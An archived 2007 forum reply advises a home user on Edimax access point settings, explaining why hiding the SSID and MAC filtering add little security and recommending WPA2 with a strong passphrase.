Thread: EW-7206APg Wireless LAN Access Point
View Single Post
  #8 (permalink)  
Old 05-01-2007, 05:25 PM
Jeff Liebermann
Guest
  
Posts: n/a
Default Re: EW-7206APg Wireless LAN Access Point
yousaf.hassan@gmail.com hath wroth:

>Thanks for your reply.
>
>Could you please explain why disabling ESSID broadcast would add
>nothing to security? The manual says:
>
>"If you enable "Broadcast ESSID", every wireless station located
>within the coverage of this access point can discover this access
>point easily. If you are building a public wireless network, enabling
>this feature is recommended. Disabling "Broadcast ESSID" can provide
>better security."
>
>My network is a private home network, so I want to disable it.

Security by obscurity is not a good idea. Anyone with a decent
wireless sniffer (Kismet on Linux) can find your SSID. If someone
were interested in breaking into your network, or sniffing the
traffic, it is trivial to extract the SSID from a capture file.

However, what hiding the SSID does is prevent neighbors and other
users from easily detecting your system. If someone moves in next
door, and sets up a network on your channel, both will get
interference, but your system will not show up on their "site survey".

Whether you decide to broadcast your SSID or not is entirely your
decision. To a knowledgeable hacker, it is not a problem and will not
slow them down in the slightest. To the neighboring systems, it's a
common source of confusion.

>As for IAPP, this is what the manual says:
>
>"If you enable "IAPP", the access point will automatically broadcast
>information of associated wireless stations to its neighbors. This
>will help wireless station roaming smoothly between access points. If
>you have more than one access points in your wireless LAN and wireless
>stations have roaming requirements, enabling this feature is
>recommended. Disabling "IAPP" can provide better security."
>
>I have only one access point, and my wireless stations do not have any
>roaming requirements. That's why I turned it off.

It doesn't matter as IAPP requires that the neighboring access points
MAC address be inscribed in the configuration files so that the
roaming client can keep the same IP address and successfully
re-authenticate with 802.1x from any access point in the system.
Without multiple access points, IAPP is useless. On or off doesn't
matter as it's not going to generate any traffic with only one access
point in the system.

>As for encryption and security, both WPA (with a strong passphrase)
>and MAC access control are enabled.

WPA is your primary security method. Avoid dictionary words in the
passphrase.

MAC address filtering has been somewhat of a problem for my customers.
The problem is that someone shows up with a new computer or game
machine and wants to connect. So, the owner has to dig into the AP or
wireless router configuration in order to add the new device. After
doing this about 5 times, I'm usually asked by the customer how to
defeat this non-feature. It's also not a very useful security feature
as MAC addresses are sent un-encrypted in 802.11 packets. They're
there for everyone to see, no matter how much encryption you have
configured. MAC addresses are also very easy to spoof.
<http://en.wikisource.org/wiki/Changing_MAC_addresses>
I wouldn't bother with MAC address filtering.

>Could you also explain what Fast Roaming Threshold is? What value is
>recommended for this option? There is no mention in the manual for
>this!

That's a bit complicated as there are multiple proposed
implementations of fast roaming available.
<http://en.wikipedia.org/wiki/IEEE_802.11r>
If I knew which one the Edimax EW-7206APg supported, I could possibly
give a sane answer, but I'm late for lunch. Basically, it determines
how aggressively the access point holds onto a connection. Usually,
this is the responsibility of the client software, but 802.11r
transfers the responsibility to the access point. What happens is
that the access point try's to determine if the client is moving out
of range and should roam to a different access point in the system.
The threshold is probably related to some signal quality metric that
determines if the access point should give up trying to stay connected
and issue a disconnect message, which will cause the client to scan
for a better connection. Again, it's only applicable if you have
multiple access points in your WLAN system and should probably be left
at the default value.

Suggestion: Use WPA-2 to secure your network. Change the router
config and guest passwords. Get a RADIUS server if you don't like
shared WPA keys (probably overkill for a home system). Learn how to
read the log files to check for anything funny. Never mind the other
dumb ideas on securing your WLAN.

--
Jeff Liebermann jeffl@comix.santa-cruz.ca.us
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060 http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558

Reply With Quote